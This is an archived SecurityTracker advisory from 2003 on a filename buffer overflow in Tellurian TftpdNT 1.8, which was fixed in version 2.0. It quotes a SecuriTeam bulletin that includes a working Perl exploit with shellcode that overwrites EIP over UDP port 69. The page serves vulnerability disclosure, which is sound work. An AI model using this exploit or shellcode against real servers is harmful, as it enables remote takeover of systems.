SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (File Transfer/Sharing)  >   TftpdNT Vendors:   Tellurian
Tellurian TftpdNT Buffer Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1007582
SecurityTracker URL:  http://securitytracker.com/id/1007582
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 26 2003
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.8
Description:   A buffer overflow vulnerability was reported in Tellurian TftpdNT. A remote user can execute arbitrary code on the system.

SecuriTeam reported that a remote user can specify a specially crafted filename to trigger the buffer overflow and overwrite the EIP register, potentially executing arbitrary code.

A demonstration exploit is provided in the Source Message.

SecuriTeam credits STORM with discovering the flaw.
Impact:   A remote user can execute arbitrary code with the privileges of the TFTP server.
Solution:   The vendor has released a fixed version (2.0), available at:

http://www.tellurian.com.au/products/trinkets/tftpdNT/
http://www.tellurian.com.au/products/trinkets/tftpdNT/tftpdnt_trial.exe
Vendor URL:  www.tellurian.com.au/products/trinkets/tftpdNT/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  26 Aug 2003 15:42:38 +0200
Subject:  [NT] Security Vulnerability in Tellurian TftpdNT (Long Filename)


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Security Vulnerability in Tellurian TftpdNT (Long Filename) 
------------------------------------------------------------------------


SUMMARY

 <http://www.tellurian.com.au/> Tellurian TftpdNT is a TFTP server for 
Windows NT and Windows 9x.  
A buffer overflow vulnerability in the product allows remote attackers to 
cause the product to overflow an internal buffer, while executing 
arbitrary code. 

DETAILS

Vulnerable systems: 
 * TftpdNT version 1.8 
 
Immune systems: 
 * TftpdNT version 2.0 
 
It is possible to cause a buffer overflow in the Tellurian TftpdNT 
product, while overwriting the EIP pointer - this allows remote command 
execution.  
The overflow occurs in the product's parsing of the filename. 
 
Vendor status: 
The vendor has been informed, and has fixed the issue within 24 hours. A 
new version is available on the web site. 
 
Exploit: 
#!/usr/bin/perl -w 
#Tellurian TFTP Server buffer overflow vulnerability 
 
use IO::Socket; 
$host = "192.168.1.44"; 
$port = "69"; 
 
$shellcode = "\x90\xCC\x90\x90\x90\x90\x8B\xEC\x55\x8B\xEC\x33\ 
\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45\xF9\x6D\xC6\x45\ 
\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\ 
\x45\xFE\x65\xB8\xC3\xAF\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x5F"; 
 
$buf = "\x00\x02"; 
$buf .= "\x41"x(508-length($shellcode)); 
$buf .= $shellcode; 
$buf .= "\x0F\x02\xC7"; # EIP 
$buf .= "\x00\x6E\x65\x74\x61\x73\x63\x69\x69\x00"; 
 
print "Length: ", length($buf), "\n"; 
 
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: 
$@\n"; 
$ipaddr = inet_aton($host) || $host; 
$portaddr = sockaddr_in($port, $ipaddr); 
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: 
$!\n"; 
print "Done\n"; 


ADDITIONAL INFORMATION

SecurITeam would like to thank  <mailto:storm@securiteam.com> STORM for 
finding this vulnerability.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
 profits or special damages.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC